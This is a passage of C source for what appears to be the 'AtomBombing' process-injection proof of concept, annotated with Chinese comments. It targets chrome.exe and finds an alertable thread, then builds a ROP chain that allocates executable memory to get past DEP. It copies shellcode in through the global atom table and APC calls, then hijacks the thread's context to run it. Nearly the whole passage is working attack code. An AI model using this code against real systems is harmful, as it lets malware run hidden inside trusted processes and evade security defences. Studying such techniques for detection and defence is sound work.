ESTATUS eReturn = ESTATUS_INVALID;
HMODULE hNtDll = NULL;
hNtDll = GetModuleHandleA("kernelbase.dll");
if (NULL == hNtDll)
{
eReturn = ESTATUS_MAIN_GETCODECAVEADDRESS_GETMODULEHANDLEA_FAILED;
}
eReturn = main_GetSectionHeader(hNtDll, DATA_SECTION, &ptSectionHeader);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
pvCodeCave = (PVOID)(
(DWORD)hNtDll +
ptSectionHeader->VirtualAddress +
ptSectionHeader->SizeOfRawData
);
eReturn = ESTATUS_SUCCESS;
*ppvCodeCave = pvCodeCave;
lblCleanup:
return eReturn;
}
ESTATUS main_FindRetGadget(PVOID *ppvRetGadget)
{
PIMAGE_SECTION_HEADER ptSectionHeader = NULL;
PVOID pvCodeCave = NULL;
ESTATUS eReturn = ESTATUS_INVALID;
HMODULE hNtDll = NULL;
PVOID pvRetGadget = NULL;
hNtDll = GetModuleHandleA(NTDLL);
if (NULL == hNtDll)
{
eReturn = ESTATUS_MAIN_FINDRETGADGET_GETMODULEHANDLEA_FAILED;
}
eReturn = main_GetSectionHeader(hNtDll, TEXT_SECTION, &ptSectionHeader);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
pvRetGadget = memchr(
hNtDll + ptSectionHeader->VirtualAddress,
X86_RET,
ptSectionHeader->SizeOfRawData
);
if (NULL == pvRetGadget)
{
eReturn = ESTATUS_MAIN_FINDRETGADGET_RET_GADGET_NOT_FOUND;
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
*ppvRetGadget = pvRetGadget;
lblCleanup:
return eReturn;
}
typedef struct _ROPCHAIN
{
// Return address of ntdll!ZwAllocateMemory
PVOID pvMemcpy;
// Params for ntdll!ZwAllocateMemory
HANDLE ZwAllocateMemoryhProcess;
PVOID ZwAllocateMemoryBaseAddress;
ULONG_PTR ZwAllocateMemoryZeroBits;
PSIZE_T ZwAllocateMemoryRegionSize;
ULONG ZwAllocateMemoryAllocationType;
ULONG ZwAllocateMemoryProtect;
// Return address of ntdll!memcpy
PVOID pvRetGadget;
// Params for ntdll!memcpy
PVOID MemcpyDestination;
PVOID MemcpySource;
SIZE_T MemcpyLength;
} ROPCHAIN, *PROPCHAIN;
ESTATUS main_BuildROPChain(
PVOID pvROPLocation,
PVOID pvShellcodeLocation,
PROPCHAIN ptRopChain
)
{
ESTATUS eReturn = ESTATUS_INVALID;
ROPCHAIN tRopChain = { 0 };
tRopChain.ZwAllocateMemoryhProcess = GetCurrentProcess();
tRopChain.ZwAllocateMemoryBaseAddress = (PUCHAR)pvROPLocation + FIELD_OFFSET(
ROPCHAIN,
MemcpyDestination
);
tRopChain.ZwAllocateMemoryZeroBits = NULL;
tRopChain.ZwAllocateMemoryRegionSize = (PSIZE_T)((PUCHAR)pvROPLocation + FIELD_OFFSET(
ROPCHAIN,
MemcpyLength)
);
tRopChain.ZwAllocateMemoryAllocationType = MEM_COMMIT;
tRopChain.ZwAllocateMemoryProtect = PAGE_EXECUTE_READWRITE;
tRopChain.MemcpyDestination = (PVOID)0x00;
tRopChain.MemcpySource = pvShellcodeLocation;
tRopChain.MemcpyLength = sizeof(SHELLCODE);
eReturn = GetFunctionAddressFromDll(
NTDLL,
MEMCPY,
&tRopChain.pvMemcpy
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
printf("ntdll!memcpy: 0x%X", tRopChain.pvMemcpy);
// Find a ret instruction in order to finally jump to the
// newly allocated executable shellcode.
eReturn = main_FindRetGadget(&tRopChain.pvRetGadget);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
*ptRopChain = tRopChain;
lblCleanup:
return eReturn;
}
ESTATUS main_EnumProcessThreadIds(
HANDLE hProcess,
PDWORD *ppdwThreadIds,
PDWORD pcbThreadIdsSize,
PDWORD pdwNumberOfProcessThreads
)
{
HANDLE hSnapshot = NULL;
ESTATUS eReturn = ESTATUS_INVALID;
THREADENTRY32 tThreadEntry;
BOOL bErr = FALSE;
DWORD dwProcessId = 0;
PDWORD pdwThreadIds = NULL;
DWORD cbThreadIdsSize = 0;
DWORD dwNumberOfMatchingThreads = 0;
dwProcessId = GetProcessId(hProcess);
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (INVALID_HANDLE_VALUE == hSnapshot)
{
goto lblCleanup;
}
tThreadEntry.dwSize = sizeof(THREADENTRY32);
bErr = Thread32First(hSnapshot, &tThreadEntry);
if (FALSE == bErr)
{
goto lblCleanup;
}
do
{
if (tThreadEntry.th32OwnerProcessID != dwProcessId)
{
continue;
}
cbThreadIdsSize += sizeof(tThreadEntry.th32ThreadID);
if (sizeof(tThreadEntry.th32ThreadID) == cbThreadIdsSize)
{
pdwThreadIds = (PDWORD)HeapAlloc(
GetProcessHeap(),
HEAP_ZERO_MEMORY,
cbThreadIdsSize
);
}
else
{
pdwThreadIds = (PDWORD)HeapReAlloc(
GetProcessHeap(),
HEAP_ZERO_MEMORY,
pdwThreadIds,
cbThreadIdsSize
);
}
if (NULL == pdwThreadIds)
{
goto lblCleanup;
}
pdwThreadIds[dwNumberOfMatchingThreads++] = tThreadEntry.th32ThreadID;
} while (bErr = Thread32Next(hSnapshot, &tThreadEntry));
*ppdwThreadIds = pdwThreadIds;
*pcbThreadIdsSize = cbThreadIdsSize;
*pdwNumberOfProcessThreads = dwNumberOfMatchingThreads;
eReturn = ESTATUS_SUCCESS;
lblCleanup:
if ((NULL != hSnapshot) && (INVALID_HANDLE_VALUE != hSnapshot))
{
CloseHandle(hSnapshot);
hSnapshot = NULL;
}
if (ESTATUS_FAILED(eReturn))
{
if (NULL != pdwThreadIds)
{
HeapFree(GetProcessHeap(), 0, pdwThreadIds);
pdwThreadIds = NULL;
}
}
return eReturn;
}
VOID main_CloseLocalHandleArray(PHANDLE phHandles, DWORD cbHandleCount)
{
for (DWORD dwIndex = 0; dwIndex < cbHandleCount; dwIndex++)
{
if (NULL != phHandles[dwIndex])
{
CloseHandle(phHandles[dwIndex]);
phHandles[dwIndex] = NULL;
}
}
}
VOID main_CloseRemoteHandleArray(
HANDLE hProcess,
PHANDLE phHandles,
DWORD cbHandleCount
)
{
for (DWORD dwIndex = 0; dwIndex < cbHandleCount; dwIndex++)
{
HANDLE hTemp = NULL;
if (NULL != phHandles[dwIndex])
{
DuplicateHandle(
hProcess,
phHandles[dwIndex],
GetCurrentProcess(),
&hTemp,
0,
FALSE,
DUPLICATE_CLOSE_SOURCE
);
phHandles[dwIndex] = NULL;
}
if (NULL != hTemp)
{
CloseHandle(hTemp);
hTemp = NULL;
}
}
}
ESTATUS main_EnumProcessThreads(
HANDLE hProcess,
PHANDLE *pphProcessThreadsHandles,
PDWORD pcbProcessThreadsHandlesSize,
PDWORD pdwNumberOfProcessThreads
)
{
ESTATUS eReturn = ESTATUS_INVALID;
PDWORD pdwProcessThreadIds = NULL;
DWORD cbProcessThreadIdsSize = 0;
DWORD dwNumberOfProcessThreads = 0;
PHANDLE phProcessThreadsHandles = NULL;
eReturn = main_EnumProcessThreadIds(
hProcess,
&pdwProcessThreadIds,
&cbProcessThreadIdsSize,
&dwNumberOfProcessThreads
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
cbProcessThreadIdsSize = dwNumberOfProcessThreads * sizeof(HANDLE);
phProcessThreadsHandles = (PHANDLE)HeapAlloc(
GetProcessHeap(),
HEAP_ZERO_MEMORY,
cbProcessThreadIdsSize
);
if (NULL == phProcessThreadsHandles)
{
goto lblCleanup;
}
for (DWORD dwIndex = 0; dwIndex < dwNumberOfProcessThreads; dwIndex++)
{
DWORD dwThreadId = pdwProcessThreadIds[dwIndex];
phProcessThreadsHandles[dwIndex] = OpenThread(THREAD_ALL_ACCESS, FALSE, dwThreadId);
if (NULL == phProcessThreadsHandles[dwIndex])
{
eReturn = ESTATUS_MAIN_ENUMPROCESSTHREADS_OPENTHREAD_FAILED;
goto lblCleanup;
}
}
*pphProcessThreadsHandles = phProcessThreadsHandles;
*pcbProcessThreadsHandlesSize = cbProcessThreadIdsSize;
*pdwNumberOfProcessThreads = dwNumberOfProcessThreads;
eReturn = ESTATUS_SUCCESS;
lblCleanup:
if (NULL != pdwProcessThreadIds)
{
HeapFree(GetProcessHeap(), 0, pdwProcessThreadIds);
pdwProcessThreadIds = NULL;
}
if (ESTATUS_FAILED(eReturn))
{
main_CloseLocalHandleArray(phProcessThreadsHandles, dwNumberOfProcessThreads);
if (NULL != phProcessThreadsHandles)
{
HeapFree(GetProcessHeap(), 0, phProcessThreadsHandles);
phProcessThreadsHandles = NULL;
}
}
return eReturn;
}
ESTATUS main_GetThreadContext(
HANDLE hThread,
DWORD dwContextFlags,
PCONTEXT ptContext
)
{
ESTATUS eReturn = ESTATUS_INVALID;
DWORD dwErr = 0;
BOOL bErr = FALSE;
CONTEXT tContext = { NULL };
tContext.ContextFlags = dwContextFlags;
SuspendThread(hThread);
if (((DWORD)-1) == dwErr)
{
eReturn = ESTATUS_MAIN_GETTHREADCONTEXT_SUSPENDTHREAD_FAILED;
goto lblCleanup;
}
bErr = GetThreadContext(hThread, &tContext);
if (FALSE == bErr)
{
eReturn = ESTATUS_MAIN_GETTHREADCONTEXT_GETTHREADCONTEXT_FAILED;
goto lblCleanup;
}
ResumeThread(hThread);
if (((DWORD)-1) == dwErr)
{
eReturn = ESTATUS_MAIN_GETTHREADCONTEXT_RESUMETHREAD_FAILED;
goto lblCleanup;
}
eReturn = ESTATUS_SUCCESS;
*ptContext = tContext;
lblCleanup:
return eReturn;
}
ESTATUS main_FindAlertableThread(HANDLE hProcess, PHANDLE phAlertableThread)
{
ESTATUS eReturn = ESTATUS_INVALID;
PHANDLE phProcessThreadsHandles = NULL;
DWORD cbProcessThreadsHandlesSize = 0;
DWORD dwNumberOfProcessThreads = 0;
BOOL bErr = FALSE;
DWORD dwErr = 0;
HANDLE hAlertableThread = 0;
PVOID pfnNtWaitForSingleObject = NULL;
PHANDLE phLocalEvents = NULL;
PHANDLE phRemoteEvents = NULL;
eReturn = main_EnumProcessThreads(
hProcess,
&phProcessThreadsHandles,
&cbProcessThreadsHandlesSize,
&dwNumberOfProcessThreads
); //phProcessThreadsHandles 目标进程的所有线程
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
for (DWORD dwIndex = 0; dwIndex < dwNumberOfProcessThreads; dwIndex++)
{
HANDLE hThread = phProcessThreadsHandles[dwIndex];
eReturn = main_NtQueueApcThreadWaitForSingleObjectEx(
hThread,
GetCurrentThread(),
5000,
TRUE);
//所有线程通过APC去调用WaitForSingleObjectEx来等待我们的当前线程
if (ESTATUS_FAILED(eReturn))
{
continue;
}
}
// 在本地创建和线程数目相等的Event
phLocalEvents = (PHANDLE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNumberOfProcessThreads * sizeof(HANDLE));
if (NULL == phLocalEvents)
{
eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_HEAPALLOC_FAILED;
goto lblCleanup;
}
phRemoteEvents = (PHANDLE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNumberOfProcessThreads * sizeof(HANDLE));
if (NULL == phRemoteEvents)
{
eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_HEAPALLOC2_FAILED;
goto lblCleanup;
}
for (DWORD dwIndex = 0; dwIndex < dwNumberOfProcessThreads; dwIndex++)
{
HANDLE hThread = phProcessThreadsHandles[dwIndex];
phLocalEvents[dwIndex] = CreateEvent(NULL, TRUE, FALSE, NULL);
if (NULL == phLocalEvents[dwIndex])
{
eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_CREATEEVENT_FAILED;
goto lblCleanup;
}
// 通过duplicate复制每个event句柄到目标进程的句柄表里 实现进程间通信
bErr = DuplicateHandle(
GetCurrentProcess(),
phLocalEvents[dwIndex],
hProcess,
&phRemoteEvents[dwIndex],
0,
FALSE,
DUPLICATE_SAME_ACCESS
);
if (FALSE == bErr)
{
eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_DUPLICATEHANDLE_FAILED;
goto lblCleanup;
}
//然后循环把所有线程都挂起然后调用SetEvent设置event信号 然后都用WaitForSingleObjectEx去等待当前线程(5秒然后恢复线程)
eReturn = main_ApcSetEventAndKeepAlertable(hThread, phRemoteEvents[dwIndex]);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
}
DWORD dwWaitResult = WaitForMultipleObjects(dwNumberOfProcessThreads, phLocalEvents, FALSE, 5000);
if (WAIT_FAILED == dwWaitResult)
{
eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_WAITFORMULTIPLEOBJECTS_FAILED;
goto lblCleanup;
}
if (WAIT_TIMEOUT == dwWaitResult)
{
eReturn = ESTATUS_MAIN_FINDALERTABLETHREAD_NO_ALERTABLE_THREADS_FOUND;
goto lblCleanup;
}
hAlertableThread = phProcessThreadsHandles[dwWaitResult - WAIT_OBJECT_0];
//If the thread is in an alertable state, keep it that way "forever".
//最后用WaitForMultipleObjects去等待所有event,
//然后把第一个返回的再用WaitForSingleObjectEx永久等待(之前调用WaitForSingleObjectEx的超时都是5秒)
eReturn = main_NtQueueApcThreadWaitForSingleObjectEx(
hAlertableThread,
GetCurrentThread(),
INFINITE,
TRUE
);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
*phAlertableThread = hAlertableThread;
eReturn = ESTATUS_SUCCESS;
lblCleanup:
main_CloseRemoteHandleArray(
hProcess,
phRemoteEvents,
dwNumberOfProcessThreads
);
if (NULL != phRemoteEvents)
{
HeapFree(GetProcessHeap(), 0, phRemoteEvents);
phRemoteEvents = NULL;
}
main_CloseLocalHandleArray(
phLocalEvents,
dwNumberOfProcessThreads
);
if (NULL != phLocalEvents)
{
HeapFree(GetProcessHeap(), 0, phLocalEvents);
phLocalEvents = NULL;
}
for (DWORD dwIndex = 0; dwIndex < dwNumberOfProcessThreads; dwIndex++)
{
PHANDLE phThread = &phProcessThreadsHandles[dwIndex];
if ((NULL != *phThread) && (hAlertableThread != *phThread))
{
CloseHandle(*phThread);
*phThread = NULL;
}
}
if (NULL != phProcessThreadsHandles)
{
HeapFree(GetProcessHeap(), 0, phProcessThreadsHandles);
phProcessThreadsHandles = NULL;
}
return eReturn;
}
ESTATUS main_GetThreadTebAddress(HANDLE hThread, PVOID *ppvTebAddress)
{
ESTATUS eReturn = ESTATUS_INVALID;
CONTEXT tContext = { 0 };
BOOL bErr = FALSE;
LDT_ENTRY tLdtEnry = { 0 };
PVOID pvTebAddress;
eReturn = main_GetThreadContext(hThread, CONTEXT_SEGMENTS, &tContext);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
bErr = GetThreadSelectorEntry(hThread, tContext.SegFs, &tLdtEnry);
if (FALSE == bErr)
{
eReturn = ESTATUS_MAIN_GETTHREADTEBADDRESS_GETTHREADSELECTORENTRY_FAILED;
goto lblCleanup;
}
pvTebAddress = (PVOID)(
(tLdtEnry.BaseLow) |
(tLdtEnry.HighWord.Bytes.BaseMid << 0x10) |
(tLdtEnry.HighWord.Bytes.BaseHi << 0x18)
);
*ppvTebAddress = pvTebAddress;
eReturn = ESTATUS_SUCCESS;
lblCleanup:
return eReturn;
}
int main()
{
ESTATUS eReturn = ESTATUS_INVALID;
PVOID pvRemoteShellcodeAddress = NULL;
PVOID pvRemoteGetProcAddressLoadLibraryAddress = NULL;
PVOID pvRemoteContextAddress = NULL;
PVOID pvRemoteROPChainAddress = NULL;
CONTEXT tContext = { 0 };
CHAR acShellcode[] = SHELLCODE;
PVOID pvCodeCave = NULL;
BOOL bErr = FALSE;
ROPCHAIN tRopChain = { 0 };
HANDLE hProcess = NULL;
HANDLE hAlertableThread = NULL;
ATOM tAtom = 0;
printf("[*] ATOM BOMBING
");
eReturn = main_OpenProcessByName(L"chrome.exe", &hProcess); //获取进程句柄
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
printf("[*] Searching for an alertable thread.
");
eReturn = main_FindAlertableThread(hProcess, &hAlertableThread);
///遍历所有线程,然后循环对目标进程的所有线程通过APC去调用WaitForSingleObjectEx来等待我们的当前线程
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
printf("[*] Found an alertable thread. Handle: 0x%X.
", hAlertableThread);
printf("[*] Finding remote code cave.
");
// //获取代码空洞地址,就用kernelbase.dll的.data节的虚拟地址+SizeOfRawData
eReturn = main_GetCodeCaveAddress(&pvCodeCave);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
printf("[*] Remote code cave found: 0x%X.
", pvCodeCave);
pvRemoteROPChainAddress = pvCodeCave; //存放的是ROPCHAIN结构体
pvRemoteContextAddress = (PUCHAR)pvRemoteROPChainAddress + sizeof(ROPCHAIN); //等于ROPCHAIN的大小是2c
pvRemoteGetProcAddressLoadLibraryAddress = (PUCHAR)pvRemoteContextAddress + FIELD_OFFSET(CONTEXT, ExtendedRegisters); //CONTENT的大小是0xcc
pvRemoteShellcodeAddress = (PUCHAR)pvRemoteGetProcAddressLoadLibraryAddress + 8;
//就是pvRemoteGetProcAddressLoadLibraryAddress +8,pvRemoteGetProcAddressLoadLibraryAddress 里放的就是GetProcAddress和LoadLibrary的地址
printf("[*] Building ROP chain.
");
//这个函数就是构造ROP,然后通过设置线程环境的EIP为AllocateVirtualMemory,
//esp和ebp为拷贝到远程的pvRemoteROPChainAddress的地址,结合上面的ROPCHAIN结构的实际数据来举例,
//当目标线程恢复后跳到AllocateVirtualMemory入口点,因为esp地址为pvRemoteROPChainAddress了,所以pvMemcpy为函数返回地址,
//下面6个为参数,实为AllocateVirtualMemory(0xffffffff,0x76d01420,0,0x76d01428,0x1000,0x40);
//可以看到保护为0x40,实为PAGE_EXECUTE_READWRITE,根据原文中作者的意思是过DEP,AllocateVirtualMemory调用完了之后就跳到Memcpy去执行,
//现在esp的结构
eReturn = main_BuildROPChain(pvRemoteROPChainAddress, pvRemoteShellcodeAddress, &tRopChain);
//pvRetGadget是返回地址,下面3个是参数,pvRetGadget实际只是一个ret指令在ntdll.dll的地址,实为memcpy(0,0x76d01500,0x171);
//这里目标为0,是因为AllocateVirtualMemory的目标地址为0x76d01420,AllocateVirtualMemory调用完了后这里就会放一个地址了,
//memcpy拷贝完shellcode后,就会返回到pvRetGadget去执行,ret就会返回到0x76d01420里的拷贝过来的shellcode去执行
//,它首先通过GlobalAddAtom函数把要拷贝的数据放到原子表里然后得到原子,再用APC在目标线程用原子调用GlobalGetAtomName把原子里的数据放到远程内存地址里
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
printf("[*] Copying the addresses of LoadLibraryA and GetProcAddress to the remote process's memory address space.
");
eReturn = main_ApcCopyFunctionPointers(hProcess, hAlertableThread, pvRemoteGetProcAddressLoadLibraryAddress);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
*(PDWORD)(acShellcode + SHELLCODE_FUNCTION_POINTERS_OFFSET) = (DWORD)(pvRemoteGetProcAddressLoadLibraryAddress);
printf("[*] Copying the shellcode to the target process's address space.
");
eReturn = main_ApcWriteProcessMemory(hProcess, hAlertableThread, (PUCHAR)pvRemoteShellcodeAddress, acShellcode, sizeof(acShellcode));
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
printf("[*] Copying ROP chain to the target process's address space: 0x%X.
", pvRemoteROPChainAddress);
eReturn = main_ApcWriteProcessMemory(hProcess, hAlertableThread, (PUCHAR)pvRemoteROPChainAddress, &tRopChain, sizeof(tRopChain));
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
bErr = main_GetThreadContext(hAlertableThread, CONTEXT_CONTROL, &tContext);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
tContext.Eip = (DWORD)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwAllocateVirtualMemory");
tContext.Ebp = (DWORD)(PUCHAR)pvRemoteROPChainAddress;
tContext.Esp = (DWORD)(PUCHAR)pvRemoteROPChainAddress;
printf("[*] Hijacking the remote thread to execute the shellcode (by executing the ROP chain).
");
eReturn = main_ApcSetThreadContext(hProcess, hAlertableThread, &tContext, pvRemoteContextAddress);
if (ESTATUS_FAILED(eReturn))
{
goto lblCleanup;
}
lblCleanup:
if (NULL != hProcess)
{
CloseHandle(hProcess);
hProcess = NULL;
}
if (NULL != hAlertableThread)
{
CloseHandle(hAlertableThread);
hAlertableThread = NULL;
}
return 0;
}